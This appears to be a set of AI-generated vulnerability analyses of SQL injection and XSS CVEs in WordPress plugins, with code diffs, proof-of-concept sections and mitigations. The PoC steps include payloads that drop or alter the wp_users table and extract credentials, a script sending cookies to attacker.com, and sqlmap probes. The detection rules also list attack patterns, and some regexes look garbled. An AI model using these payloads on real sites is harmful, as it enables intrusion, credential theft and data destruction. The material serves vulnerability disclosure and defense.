   - `sanitize_text_field()` for general text
   - `esc_sql()` for database queries (though `prepare()` is better)
   - `esc_html()` for HTML output
   - `esc_url()` for URLs

10. **Security Through Obscurity is NOT Security**: Do not rely on hidden endpoints or complex parameter names

### Long-term Security Strategy

1. **Implement Security Development Lifecycle (SDL)**
2. **Use Security-Focused Code Review Checklists**
3. **Automate Security Testing in CI/CD Pipeline**
4. **Maintain an Incident Response Plan**
5. **Regularly Update Security Knowledge Base**

**Critical Note**: The partial fix in version 3.7.9 leaves the SQL injection vulnerability unaddressed. Organizations should consider this vulnerability as still partially exploitable even after updating to the "patched" version. Additional manual remediation or temporary disabling of the affected functionality may be necessary until a complete fix is released.

CVE-2025-28983 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-28983 - Click & Pledge Connect SQL Injection and Privilege Escalation Vulnerability

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-28983 is a critical security vulnerability in the Click & Pledge Connect WordPress plugin that combines multiple SQL injection flaws with cross-site scripting (XSS) vulnerabilities, ultimately enabling privilege escalation. The vulnerability stems from improper input validation and sanitization across multiple plugin files, allowing attackers to manipulate database queries and execute arbitrary code in the context of the application.

### Why is it critical/important?
This vulnerability is rated as critical due to several factors:

1. **Privilege Escalation Impact**: Successful exploitation allows attackers to gain administrative access to WordPress installations
2. **Multiple Attack Vectors**: The vulnerability exists across multiple files and functions, increasing the attack surface
3. **Direct Database Access**: SQL injection vulnerabilities provide direct access to sensitive data including user credentials, payment information, and organizational data
4. **Chained Exploitation**: The combination of SQL injection and XSS allows for sophisticated attack chains
5. **Wide Deployment**: Click & Pledge is used by numerous non-profit organizations for donation processing, making this a high-value target

### What systems/versions are affected?
- **Affected Versions**: Click & Pledge Connect versions 25.04010101 through WP6.8
- **Fixed Version**: 25.07000000-WP6.8.1 and later
- **Impacted Systems**: WordPress installations with the vulnerable plugin versions installed
- **Prerequisites**: Attacker must have some level of access (typically contributor or higher) to exploit the initial vulnerabilities

## 2. Technical Details

### Root Cause Analysis
The vulnerability originates from multiple instances of improper input handling across the plugin codebase:

1. **Direct SQL String Concatenation**: User-controlled variables were directly interpolated into SQL queries without proper escaping
2. **Insufficient Input Validation**: Numeric parameters were treated as text with basic sanitization rather than proper type validation
3. **Improper Use of Prepared Statements**: Variables were concatenated into SQL strings before being passed to `$wpdb->prepare()`, bypassing parameter binding protections
4. **Lack of Output Sanitization**: HTML content was echoed without proper escaping, enabling XSS attacks
5. **Manual WordPress Initialization**: Custom database connections bypassed WordPress security mechanisms

### Old Code vs New Code Analysis

#### SQL Injection in Table Name Handling
**Old Code (clickandpledge_form.php Lines 124-126):**
```php
$wpdb->query(
    "ALTER TABLE $cnp_formtable_name ADD COLUMN `cnpform_urlparameters` TEXT NOT NULL"
);
```

**New Code:**
```php
$expected_table = $wpdb->prefix . 'cnp_formsdtl';
if ( $cnp_formtable_name === $expected_table && (int) $check_column === 0 ) {
    $query = "ALTER TABLE `$expected_table` ADD COLUMN `cnpform_urlparameters` TEXT NOT NULL";
    $wpdb->query( $query );
}
```

**Security Improvement**: The fix validates the table name against an expected value before using it in the query, preventing table name manipulation.

#### Improper Prepared Statement Usage
**Old Code (functionscnp.php Lines 40-70):**
```php
$cnpGetImagesql = $wpdb->prepare(
    "SELECT * FROM $cnp_table_name 
     WHERE (cnpform_shortcode = %s OR cnpform_shortcode = %s)",
    '[CnPConnect ' . $cnpshortcode . ']',  // User input concatenated before binding
    '[CnP.Form ' . $cnpshortcode . ']'
);
```

**New Code:**
```php
$cnpshortcode = sanitize_text_field($cnpshortcode);
$table = esc_sql($cnp_table_name);
$shortcode1 = '[CnPConnect ' . $cnpshortcode . ']';
$shortcode2 = '[CnP.Form ' . $cnpshortcode . ']';

$sql = $wpdb->prepare(
    "SELECT * FROM {$table} 
     WHERE (cnpform_shortcode = %s OR cnpform_shortcode = %s)",
    $shortcode1,  // Properly bound as parameters
    $shortcode2
);
```

**Security Improvement**: User input is sanitized before concatenation, and table names are properly escaped using `esc_sql()`.

#### Cross-Site Scripting (XSS) Vulnerability
**Old Code (clickandpledge_form.php Lines 49-53):**
```php
$alertvar = "CRITICAL UPDATE: There is a new version...";
?>
<div class="error notice">
    <p><?php _e( $alertvar, 'my_plugin_textdomain'); ?></p>
</div>
```

**New Code:**
```php
$alertvar = __(
    "CRITICAL UPDATE: There is a new version...",
    'click-pledge-connect'
);
?>
<div class="error notice">
    <p><?php echo wp_kses_post( $alertvar ); ?></p>
</div>
```

**Security Improvement**: The fix uses `wp_kses_post()` to sanitize HTML output, allowing only safe HTML tags and attributes.

### How These Changes Fix the Vulnerability

1. **Proper Parameter Binding**: All user inputs are now properly bound using `$wpdb->prepare()` with appropriate placeholders (`%s` for strings, `%d` for integers)
2. **Input Type Enforcement**: Numeric parameters use `intval()` to ensure integer type, preventing SQL injection through type confusion
3. **Output Sanitization**: HTML output uses WordPress sanitization functions like `wp_kses_post()` to prevent XSS
4. **Table Name Validation**: Dynamic table names are validated against expected values or properly escaped
5. **Proper WordPress Initialization**: The plugin now uses `wp-load.php` instead of manually including WordPress files, ensuring all security mechanisms are properly loaded

### Security Improvements Introduced

1. **Defense in Depth**: Multiple layers of validation and sanitization
2. **Principle of Least Privilege**: Database operations are now more constrained
3. **Input Validation at Multiple Points**: Both client-side and server-side validation
4. **Secure Defaults**: Proper type casting and validation for all user inputs
5. **WordPress Security Integration**: Leveraging built-in WordPress security functions rather than custom implementations

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. WordPress installation with Click & Pledge Connect plugin (versions 25.04010101 through WP6.8)
2. Attacker must have at least contributor-level access (to access plugin functionality)
3. Knowledge of WordPress table structure and plugin database schema

### Step-by-Step Exploitation Approach

#### Step 1: Reconnaissance
```http
GET /wp-admin/admin.php?page=clickandpledge_form HTTP/1.1
Host: vulnerable-site.com
```

Identify available endpoints and parameters that accept user input.

#### Step 2: SQL Injection via Table Name Parameter
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: vulnerable-site.com
Content-Type: application/x-www-form-urlencoded

action=cnp_update_table&table_name=cnp_formsdtl'; DROP TABLE wp_users; --
```

#### Step 3: Privilege Escalation via User Manipulation
```sql
-- Example malicious SQL payload
' OR 1=1; UPDATE wp_users SET user_pass = MD5('hacked') WHERE ID = 1; --
```

#### Step 4: XSS Payload Delivery
```html
<script>
fetch('https://attacker.com/steal-cookie?cookie=' + document.cookie);
</script>
```

### Expected Behavior vs Exploited Behavior

**Expected Behavior:**
- Plugin functions process valid input and perform intended database operations
- User inputs are properly sanitized and validated
- Only authorized users can modify plugin settings

**Exploited Behavior:**
- Attackers can execute arbitrary SQL queries
- Database contents can be read, modified, or deleted
- Administrative privileges can be obtained
- Cross-site scripting payloads can be injected and executed in admin contexts
- Complete compromise of the WordPress installation

### How to Verify the Vulnerability Exists

2. **Black Box Testing:**
   ```http
   GET /wp-content/plugins/clickandpledge-connect/channelAdd.php?cnpviewid=1' AND SLEEP(5)-- HTTP/1.1
   ```

3. **Automated Scanning:**
   ```bash
   wpscan --url https://target.com --plugins-detected clickandpledge-connect
   ```

## 4. Recommendations

### Mitigation Strategies

1. **Immediate Actions:**
   - Update to Click & Pledge Connect version 25.07000000-WP6.8.1 or later
   - If update is not possible, disable the plugin immediately
   - Review user accounts for unauthorized administrative privileges

2. **Temporary Workarounds:**
   - Implement Web Application Firewall (WAF) rules to block SQL injection patterns
   - Restrict access to plugin administration pages
   - Enable WordPress security plugins with SQL injection protection

### Detection Methods

1. **Log Analysis:**
   ```sql
   -- Monitor for SQL error patterns
   SELECT * FROM wp_logs 
   WHERE message LIKE '%SQL syntax%' 
      OR message LIKE '%mysql_fetch%'
      OR message LIKE '%unexpected%'
   ```

2. **File Integrity Monitoring:**
   ```bash
   # Monitor plugin files for unauthorized changes
   find /wp-content/plugins/clickandpledge-connect -type f -exec md5sum {} \;
   ```

3. **Database Monitoring:**
   ```sql
   -- Monitor for unusual privilege changes
   SELECT user_login, meta_key, meta_value 
   FROM wp_users 
   JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
   WHERE meta_key LIKE '%capabilities%' 
   AND meta_value LIKE '%administrator%'
   ```

### Best Practices to Prevent Similar Issues

1. **Input Validation:**
   ```php
   // Always validate and sanitize input
   $user_id = isset($_GET['id']) ? intval($_GET['id']) : 0;
   $username = isset($_POST['username']) ? sanitize_user($_POST['username']) : '';
   ```

2. **Database Security:**
   ```php
   // Always use prepared statements
   $wpdb->prepare("SELECT * FROM {$wpdb->prefix}table WHERE id = %d", $user_id);
   
   // Escape table names properly
   $table_name = esc_sql($wpdb->prefix . 'custom_table');
   ```

3. **Output Security:**
   ```php
   // Always escape output
   echo esc_html($user_input);
   echo wp_kses_post($html_content);
   ```

4. **Security Hardening:**
   - Implement principle of least privilege for database users
   - Use WordPress nonces for all form submissions
   - Regularly update all plugins and themes
   - Conduct security audits and code reviews
   - Implement security headers (Content-Security-Policy, X-Frame-Options)

5. **Monitoring and Response:**
   - Implement real-time security monitoring
   - Maintain regular backups with offline storage
   - Develop and test incident response procedures
   - Conduct regular penetration testing

6. **Developer Education:**
   - Train developers on secure coding practices
   - Implement code review processes focusing on security
   - Use static analysis tools in CI/CD pipelines
   - Follow WordPress coding standards and security guidelines

This comprehensive analysis demonstrates the importance of proper input validation, output escaping, and secure database practices in WordPress plugin development. The patched version shows significant improvements in security posture, but ongoing vigilance and adherence to security best practices remain essential for maintaining secure WordPress installations.

CVE-2025-31599 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-31599 - SQL Injection in N-Media Bulk Product Sync

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-31599 is a critical SQL injection vulnerability in the N-Media Bulk Product Sync WordPress plugin, which allows attackers to execute arbitrary SQL commands through multiple endpoints. The vulnerability stems from improper neutralization of user-supplied input before inclusion in SQL queries, affecting database operations across product and category management functions.

### Why is it critical/important?
This vulnerability is rated as critical due to several factors:
1. **Multiple Attack Vectors**: The vulnerability exists in multiple files and functions, providing various entry points for exploitation
2. **Direct Database Access**: Successful exploitation allows complete database manipulation, including data extraction, modification, or deletion
3. **Plugin Privileges**: The plugin operates with WordPress database privileges, potentially enabling privilege escalation
4. **WooCommerce Integration**: As a WooCommerce extension, it manages sensitive e-commerce data including products, categories, and customer information

### What systems/versions are affected?
- **Affected Plugin**: N-Media Bulk Product Sync (WooCommerce extension)
- **Affected Versions**: All versions up to and including 8.6
- **Patched Version**: 9.0 and later
- **Impacted Systems**: WordPress installations with WooCommerce and the vulnerable plugin version

## 2. Technical Details

### Root Cause Analysis
The vulnerability originates from the plugin's failure to properly sanitize and parameterize user-controlled input before constructing SQL queries. The primary issues include:

1. **Direct String Concatenation**: User input was directly interpolated into SQL strings without validation
2. **Lack of Prepared Statements**: SQL queries were constructed using string concatenation instead of parameterized queries
3. **Insufficient Input Validation**: No proper type checking or sanitization of database identifiers and values
4. **Multiple Entry Points**: The vulnerability affected various functions handling product and category synchronization

### Old Code vs New Code Analysis

#### **Critical SQL Injection in `includes/functions.php`**
**Old Code (Vulnerable):**
```php
$product_status = array_map(function($status){
    return "'{$status}'";
}, $product_status);
$product_status = implode(",",$product_status);
$qry .= " AND post_status IN ({$product_status})";
```

**New Code (Fixed):**
```php
$status_escaped = array_map(function($status) use ($wpdb) {
    return $wpdb->prepare('%s', $status);
}, $product_status);
$status_sql = implode(',', $status_escaped);
$query = "SELECT DISTINCT ID FROM {$wpdb->prefix}posts 
          WHERE post_type = 'product' AND post_status IN ({$status_sql})";
```

**Security Impact**: The old code directly interpolated user-controlled status values, allowing SQL injection through the `$product_status` array. The fix uses `$wpdb->prepare()` to properly escape each value.

#### **SQL Injection in `includes/categories.class.php`**
**Old Code (Vulnerable):**
```php
foreach($row_catid as $row_id => $cat_id){
    $delqry .= "{$termid},";
    $wpsql .= "({$termid}, '{$metakey}', '{$metaval}'),";
}
$wpdb->query($delqry);
$wpdb->query($wpsql);
```

**New Code (Fixed):**
```php
$term_ids = array_map('intval', array_values($row_catid));
$delete_placeholders = implode(',', array_fill(0, count($term_ids), '%d'));

$wpdb->query(
    $wpdb->prepare(
        "DELETE FROM {$termmeta_table} WHERE term_id IN ($delete_placeholders) AND meta_key = %s",
        ...array_merge($term_ids, [$metakey])
    )
);
```

**Security Impact**: The fix introduces proper integer casting (`intval()`) and uses prepared statements with dynamic placeholder generation.

#### **Directory Traversal in File Inclusion**
**Old Code (Vulnerable):**
```php
function wbps_load_file($file_name, $vars=null) {
   $file_path = WBPS_PATH . '/templates/'.$file_name;
   if( file_exists($file_path))
    include ($file_path);
}
```

**New Code (Fixed):**
```php
function wbps_load_file($file_name, $vars = null) {
    $file_path = WBPS_PATH . '/templates/' . basename($file_name);
    if (file_exists($file_path)) {
        include $file_path;
    }
}
```

**Security Impact**: Added `basename()` to prevent directory traversal attacks via `$file_name`.

### How These Changes Fix the Vulnerability

1. **Parameterized Queries**: All SQL queries now use `$wpdb->prepare()` with proper placeholders (`%s` for strings, `%d` for integers)
2. **Input Sanitization**: Added `intval()` for numeric IDs and `sanitize_text_field()` for string values
3. **Type Enforcement**: Ensures database identifiers are properly typed before query execution
4. **Output Escaping**: Implemented `esc_url_raw()` for URLs and `esc_html()` for error messages
5. **Path Restriction**: Used `basename()` to confine file operations to intended directories

### Security Improvements Introduced

1. **Defense in Depth**: Multiple layers of validation and sanitization
2. **WordPress Best Practices**: Adherence to WordPress coding standards for database operations
3. **Error Handling**: Replaced `die()` with `wp_die()` for safer error reporting
4. **CSRF Awareness**: Identified (though not fixed) CSRF vulnerability in REST endpoints
5. **XSS Prevention**: Added output escaping for dynamic content

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. WordPress installation with WooCommerce
2. N-Media Bulk Product Sync plugin version ≤ 8.6
3. Access to plugin functionality (varies by endpoint authentication)

### Step-by-Step Exploitation Approach

**Example 1: Exploiting Product Status Query**
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded

action=wbps_sync_products
status[]=') UNION SELECT user_login,user_pass FROM wp_users WHERE ('1'='1
```

**Expected Behavior**: Plugin should validate and sanitize status values before query execution.

**Exploited Behavior**: Malicious SQL is executed, potentially extracting user credentials.

**Example 2: Category ID Manipulation**
```http
POST /wp-json/wbps/v1/category-sync HTTP/1.1
Content-Type: application/json

{
  "row_catid": {
    "1": "1 OR 1=1--",
    "2": "2; DROP TABLE wp_users--"
  }
}
```

### How to Verify the Vulnerability Exists

1. **Code Review Method**:
   ```bash
   grep -r "\$wpdb->query.*\"" includes/
   grep -r "IN ({" includes/
   ```

2. **Black Box Testing**:
   ```bash
   # Test with SQL injection payloads
   sqlmap -u "https://target.com/wp-json/wbps/v1/*" --batch
   ```

3. **Manual Verification**:
   - Install plugin version 8.6
   - Monitor database queries during synchronization operations
   - Attempt to inject SQL comments (`--`) or union queries

## 4. Recommendations

### Mitigation Strategies

1. **Immediate Actions**:
   - Update to plugin version 9.0 or later
   - If update not possible, disable the plugin immediately
   - Review database logs for suspicious queries

2. **Temporary Workarounds**:
   ```php
   // Add input validation in theme's functions.php
   add_filter('pre_option_wbps_webhook_url', function($url) {
       return filter_var($url, FILTER_VALIDATE_URL);
   });
   ```

### Detection Methods

1. **Signature-Based Detection**:
   ```regex
   /\$wpdb->query$[^)]*\$[a-zA-Z_]+[^)]*$/
   /IN\s*$\s*\{?\$[a-zA-Z_]+\}?$/
   ```

2. **Behavioral Monitoring**:
   - Monitor for unusual database queries from WordPress processes
   - Alert on SQL syntax errors in application logs
   - Track unexpected data exports or schema changes

3. **WAF Rules**:
   ```nginx
   location ~* wp-json/wbps/v1/ {
       if ($args ~* "union.*select|sleep\(|benchmark\(|--") {
           return 403;
       }
   }
   ```

### Best Practices to Prevent Similar Issues

1. **Database Operations**:
   ```php
   // Always use prepared statements
   $wpdb->query($wpdb->prepare(
       "SELECT * FROM {$wpdb->prefix}table WHERE id = %d AND name = %s",
       $id, $name
   ));
   
   // Validate and sanitize all inputs
   $clean_id = intval($_POST['id']);
   $clean_name = sanitize_text_field($_POST['name']);
   ```

2. **Security Hardening**:
   - Implement principle of least privilege for database users
   - Regular security audits using tools like PHPCS with WordPress coding standards
   - Use parameterized queries exclusively, never string concatenation

3. **Development Practices**:
   - Implement static analysis in CI/CD pipeline
   - Conduct regular security training for developers
   - Maintain an allowlist of safe functions and patterns

4. **Monitoring and Response**:
   - Implement comprehensive logging of database operations
   - Regular vulnerability scanning of plugin codebase
   - Establish incident response plan for security breaches

### Long-Term Security Strategy

1. **Architecture Review**:
   - Consider moving sensitive operations to stored procedures
   - Implement API rate limiting and request validation
   - Add authentication and authorization checks for all endpoints

2. **Third-Party Assessment**:
   - Regular penetration testing by external security firms
   - Bug bounty programs for responsible disclosure
   - Security certification for critical e-commerce components

This vulnerability demonstrates the critical importance of proper input validation and parameterized queries in WordPress plugin development. The comprehensive fixes in version 9.0 address multiple security issues, but ongoing vigilance and adherence to security best practices remain essential for maintaining a secure e-commerce environment.

CVE-2025-32550 NVD

AI-Generated Analysis

# Comprehensive Security Analysis: CVE-2025-32550 - Click & Pledge Connect Plugin SQL Injection and XSS Vulnerabilities

## 1. Vulnerability Background

**What is this vulnerability?**
CVE-2025-32550 is a critical security vulnerability affecting the Click & Pledge Connect WordPress plugin, encompassing multiple security flaws including SQL Injection (CWE-89), Cross-Site Scripting (CWE-79), and Improper Input Validation (CWE-20). The vulnerability allows authenticated attackers with administrative privileges to execute arbitrary SQL commands and inject malicious scripts through various plugin components.

**Why is it critical/important?**
This vulnerability is rated as critical due to several factors:
- **Privilege Escalation Potential**: While initial access requires admin privileges, successful exploitation could lead to complete database compromise
- **Data Breach Risk**: Attackers can extract sensitive information including user credentials, payment data, and plugin configuration
- **Persistence Mechanisms**: SQL injection can be used to create backdoor admin accounts or modify plugin behavior
- **Widespread Impact**: The plugin handles payment processing and donor information for non-profit organizations

**What systems/versions are affected?**
- **Affected Versions**: Click & Pledge Connect Plugin versions 2.24080000 through WP6.6.1
- **Patched Version**: 2.24120000-WP6.7.1
- **Impacted Components**: Multiple administrative interface files including cnpSettings.php, FormDetails.php, cnpFormDetails.php, and several others

## 2. Technical Details

### Root Cause Analysis
The vulnerability stems from multiple security anti-patterns in the plugin's codebase:

1. **Direct User Input Concatenation**: Unsanitized `$_GET`, `$_POST`, and `$_REQUEST` parameters were directly concatenated into SQL queries
2. **Lack of Prepared Statements**: Raw SQL queries without parameterization allowed injection points
3. **Missing Output Escaping**: Database values and user inputs were directly output to HTML without escaping
4. **Insufficient Input Validation**: No proper type checking or validation of user-supplied parameters

### Old Code vs New Code Analysis

**SQL Injection Example (cnpSettings.php):**
```php
// OLD VULNERABLE CODE
$delid=$_GET["did"];
$wpdb->query("delete from ".$cnp_settingtable_name." where cnpstngs_ID =".$delid);

// NEW FIXED CODE
$delid = isset($_GET["did"]) ? intval($_GET["did"]) : 0;
$result = $wpdb->delete(
    $cnp_settingtable_name,
    ['cnpstngs_ID' => $delid],
    ['%d']
);
```

**Cross-Site Scripting Example (FormDetails.php):**
```php
// OLD VULNERABLE CODE
$cname = $cnpformData->cnpform_CampaignName;
$cnpresltdsply .= '<tr><td>'.$sno.'</td><td >'.$cname.'</td>';

// NEW FIXED CODE
$cname = sanitize_text_field($cnpformData->cnpform_CampaignName);
$cnpresltdsply .= '<tr><td>' . $sno . '</td><td>' . $cname . '</td>';
```

### How These Changes Fix the Vulnerability

1. **Input Sanitization**: Implementation of `sanitize_text_field()`, `intval()`, and `absint()` functions
2. **Prepared Statements**: Migration to `$wpdb->prepare()` and parameterized queries
3. **Output Escaping**: Use of `esc_html()`, `esc_attr()`, and `esc_url()` for all dynamic content
4. **Input Validation**: Added `isset()` checks and type validation before processing
5. **Secure Database Operations**: Use of WordPress's `$wpdb->delete()` method with type placeholders

### Security Improvements Introduced

1. **Defense in Depth**: Multiple layers of protection (input validation, prepared statements, output escaping)
2. **Type Safety Enforcement**: Strict integer validation for database IDs
3. **Context-Aware Escaping**: Different escaping functions based on output context (HTML, URL, attribute)
4. **Default Values**: Proper initialization of variables to prevent undefined behavior
5. **Whitelist Validation**: Restriction of certain parameters to specific allowed values

## 3. Attack Vectors and Impact

### Primary Attack Vectors
1. **Administrative Interface Injection**: Attackers with admin access can inject SQL through various GET parameters (`did`, `cnpviewid`, `cnpsts`)
2. **Stored XSS via Database**: Malicious data inserted via SQL injection can be reflected in administrative pages
3. **File Upload Bypass**: Potential unrestricted file upload in image handling functions

### Potential Impact
- **Complete Database Compromise**: Extract all WordPress user credentials, plugin settings, and payment data
- **Remote Code Execution**: Through file upload vulnerabilities or database manipulation
- **Persistent Backdoors**: Create hidden admin accounts or modify plugin functionality
- **Client-Side Attacks**: Steal admin session cookies via XSS payloads
- **Data Manipulation**: Modify donation records, payment information, or organization data

## 4. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. **WordPress Administrator Access**: Required to access vulnerable plugin pages
2. **Plugin Version**: 2.24080000 through WP6.6.1 installed and active
3. **Direct Database Access**: MySQL/MariaDB backend accessible

### Step-by-Step Exploitation Approach

**SQL Injection via Delete Function (cnpSettings.php):**
```
1. Navigate to: /wp-admin/admin.php?page=cnp_formssettings
2. Identify record IDs from the interface
3. Craft malicious URL:
   /wp-admin/admin.php?page=cnp_formssettings&info=del&did=1 OR 1=1--
4. Observe database error or unexpected deletion
```

**Time-Based Blind SQL Injection:**
```sql
/wp-admin/admin.php?page=cnp_formssettings&info=del&did=1 AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)
```

**XSS Payload Injection:**
```
1. Identify reflected parameters (e.g., 'info' parameter)
2. Inject payload:
   /wp-admin/admin.php?page=cnp_formsdetails&info=<script>alert(document.cookie)</script>
3. Check if script executes in admin context
```

### Expected Behavior vs Exploited Behavior

**Normal Behavior:**
- Integer parameters are properly validated
- SQL queries execute with expected parameters only
- User input is escaped before HTML output
- File uploads are restricted to valid image types

**Exploited Behavior:**
- SQL queries execute arbitrary commands
- Database returns unexpected data or errors
- Script tags execute in administrative interface
- Malicious files may be uploaded and executed

### How to Verify the Vulnerability Exists

**Manual Testing:**
```bash
# Check plugin version
grep "Version" clickandpledge-connect/readme.txt

# Search for vulnerable patterns
grep -r "\$_GET\[" clickandpledge-connect/ --include="*.php"
grep -r "\$_REQUEST\[" clickandpledge-connect/ --include="*.php"
grep -r "wpdb->query.*\." clickandpledge-connect/ --include="*.php"

# Test specific endpoints
curl -k "https://target.com/wp-admin/admin.php?page=cnp_formssettings&did=1'"
```

**Automated Scanning:**
- Use SQL injection scanners (sqlmap, Burp Suite)
- Implement SAST tools to detect vulnerable patterns
- Run WordPress security scanners (WPScan, Wordfence)

## 5. Recommendations

### Mitigation Strategies

**Immediate Actions:**
1. **Update Immediately**: Upgrade to version 2.24120000-WP6.7.1 or later
2. **Access Restriction**: Limit administrative access to trusted IP addresses
3. **Database Review**: Audit database for unauthorized changes or injected data
4. **Session Rotation**: Force re-authentication for all administrative users

**Compensating Controls:**
```php
// Web Application Firewall Rules
add_filter('query', function($sql) {
    if (preg_match('/(union|select.*from|insert.*into|delete.*from)/i', $sql)) {
        // Log and block suspicious queries
        error_log("Suspicious SQL detected: " . $sql);
        return false;
    }
    return $sql;
});

// Input validation middleware
add_filter('pre_process_request', function($request) {
    foreach ($request as $key => $value) {
        if (is_string($value)) {
            $request[$key] = sanitize_text_field($value);
        }
    }
    return $request;
});
```

### Detection Methods

**Log Analysis:**
```sql
-- Monitor for SQL injection attempts
SELECT * FROM wp_logs 
WHERE message LIKE '%SQL syntax%' 
   OR message LIKE '%wpdb->prepare%'
   OR message LIKE '%unexpected query%';

-- Detect XSS payloads in requests
SELECT * FROM wp_access_logs 
WHERE request_url LIKE '%<script%'
   OR request_url LIKE '%javascript:%'
   OR request_url LIKE '%onerror=%';
```

**File Integrity Monitoring:**
```bash
# Monitor critical plugin files
find /wp-content/plugins/clickandpledge-connect -name "*.php" -exec md5sum {} \; > baseline.md5
# Regular comparison
md5sum -c baseline.md5 2>/dev/null | grep FAILED
```

### Best Practices to Prevent Similar Issues

**Development Guidelines:**
1. **Always Use Prepared Statements**: Never concatenate user input into SQL queries
2. **Implement Defense in Depth**: Validate input, use prepared statements, escape output
3. **Follow WordPress Coding Standards**: Use built-in sanitization and escaping functions
4. **Regular Security Audits**: Conduct code reviews focusing on security patterns
5. **Implement Least Privilege**: Database users should have minimal necessary permissions

**Security Testing Checklist:**
- [ ] All user inputs validated and sanitized
- [ ] SQL queries use prepared statements
- [ ] Output properly escaped based on context
- [ ] File uploads validated for type and content
- [ ] Authentication and authorization checks present
- [ ] Error messages don't reveal sensitive information
- [ ] CSRF protection implemented for all forms
- [ ] Regular dependency updates and security patches

**Continuous Monitoring:**
```yaml
# Example security monitoring configuration
security_checks:
  sql_injection:
    enabled: true
    patterns:
      - "union.*select"
      - "sleep\$\\d+\$"
      - "benchmark\\("
  xss:
    enabled: true
    patterns:
      - "<script>"
      - "javascript:"
      - "onload=|onerror="
  file_uploads:
    enabled: true
    restricted_extensions: [".php", ".phtml", ".phar"]
```

This comprehensive analysis demonstrates the critical nature of CVE-2025-32550 and provides actionable guidance for both remediation and prevention of similar vulnerabilities in WordPress plugin development.

CVE-2025-54726 NVD

AI-Generated Analysis

# Security Analysis: SQL Injection in JS Archive List (CVE-2025-54726)

## 1. Vulnerability Background

### What is this vulnerability?
CVE-2025-54726 is a critical SQL injection vulnerability in the JS Archive List WordPress plugin. The vulnerability stems from improper neutralization of user-controlled input in SQL queries, allowing attackers to inject malicious SQL commands through various plugin parameters.

### Why is it critical/important?
This vulnerability is particularly dangerous because:
- **Direct database access**: Successful exploitation could allow attackers to read, modify, or delete database contents
- **Privilege escalation**: In WordPress contexts, SQL injection can potentially lead to administrative access
- **Data exfiltration**: Sensitive information including user credentials, personal data, and private content could be extracted
- **Plugin popularity**: JS Archive List is used for displaying archive lists, making it potentially widespread

### What systems/versions are affected?
- **Affected versions**: All versions prior to 6.1.6
- **Patched version**: 6.1.6 and later
- **Impacted components**: The `JQ_Archive_List_DataSource` class in `classes/class-jq-archive-list-datasource.php`
- **WordPress compatibility**: The plugin works with various WordPress versions, making the impact potentially broad

## 2. Technical Details

### Root Cause Analysis
The vulnerability existed due to the use of unsafe string concatenation with `sprintf()` instead of parameterized queries. User-controlled values from `$this->config` array were directly interpolated into SQL strings without proper sanitization or escaping.

**Primary attack vectors:**
1. `$this->config['type']` - Post type parameter
2. `$this->config['included']` - Included term IDs
3. `$this->config['excluded']` - Excluded term IDs
4. `$year` and `$month` parameters

### Old Code vs New Code

**Vulnerable Pattern (Old Code):**
```php
// Direct string interpolation - vulnerable to SQL injection
$where = sprintf( 'WHERE post_title != \'\' AND post_type = \'%s\' AND post_status = \'publish\' ', $this->config['type'] );
// ...
$where .= sprintf( 'AND %s.term_id IN (%s)', $wpdb->term_taxonomy, $ids );
```

**Secure Pattern (New Code):**
```php
// Parameterized query with proper escaping
$where_parts[] = 'post_type = %s';
$prepare_args[] = $this->config['type'] ?? 'post';
// ...
$sql = "SELECT ... WHERE {$where_clause}";
$results = $wpdb->get_results($wpdb->prepare($sql, ...$where_args));
```

### How These Changes Fix the Vulnerability

1. **Parameterized Queries**: The fixed code uses `$wpdb->prepare()` with placeholders (`%s`, `%d`) instead of direct string interpolation
2. **Proper Argument Binding**: User input is passed as separate parameters to the prepared statement
3. **Type-Safe Placeholders**: Different placeholders for strings (`%s`) and integers (`%d`) ensure proper escaping
4. **Null Safety**: Added null coalescing operators (`??`) to handle missing configuration values
5. **Array Validation**: Proper handling of array inputs with `implode()` only after validation

### Security Improvements Introduced

1. **Input Validation**: The new code validates and sanitizes all user inputs before database operations
2. **Defense in Depth**: Multiple layers of protection including type checking and parameter binding
3. **Error Handling**: Improved error handling with array validation (`is_array($results)`)
4. **Default Values**: Safe defaults for missing configuration parameters
5. **Structured Query Building**: Separated query structure from data values

## 3. Proof of Concept (PoC) Guide

### Prerequisites for Exploitation
1. WordPress installation with JS Archive List plugin (version < 6.1.6)
2. Ability to modify plugin configuration parameters (typically through WordPress admin or theme customization)
3. Basic understanding of SQL injection techniques

### Step-by-Step Exploitation Approach

**Example 1: Exploiting the `type` parameter:**
```php
// Malicious input that could be passed to config['type']
$malicious_type = "post' OR '1'='1'; -- ";
// This would create: WHERE post_type = 'post' OR '1'='1'; -- '
```

**Example 2: Exploiting included/excluded IDs:**
```php
// Malicious ID list for SQL injection
$malicious_ids = "1) OR 1=1; -- ";
// This would create: AND term_id IN (1) OR 1=1; -- )
```

### Expected Behavior vs Exploited Behavior

**Normal Operation:**
- Plugin retrieves archive data based on legitimate filters
- Queries return only authorized content
- Database integrity maintained

**Exploited Behavior:**
- Unauthorized data extraction (user emails, passwords, private posts)
- Database modification or deletion
- Potential privilege escalation
- Cross-database query execution in some configurations

### How to Verify the Vulnerability Exists

**Manual Testing:**
1. Install vulnerable version (6.1.5 or earlier)
2. Attempt to inject SQL through configuration parameters:
   ```php
   // Test for basic injection
   $test_input = "test' AND '1'='2";
   // If query fails or returns no results, injection may be possible
   ```

**Automated Testing:**
```bash
# Use SQL injection scanning tools
sqlmap -u "https://target.com/?archive_params=test" --dbs
```

**Code Review Indicators:**
- Direct use of `sprintf()` with SQL strings
- Absence of `$wpdb->prepare()` calls
- User input directly concatenated into SQL queries

## 4. Recommendations

### Mitigation Strategies

**Immediate Actions:**
1. **Update Immediately**: Upgrade to version 6.1.6 or later
2. **Remove Unused Instances**: Deactivate and remove the plugin if not in use
3. **Access Control**: Restrict plugin configuration to trusted administrators only

**Compensating Controls:**
1. **Web Application Firewall (WAF)**: Deploy a WAF with SQL injection rules
2. **Database Permissions**: Implement least privilege database accounts
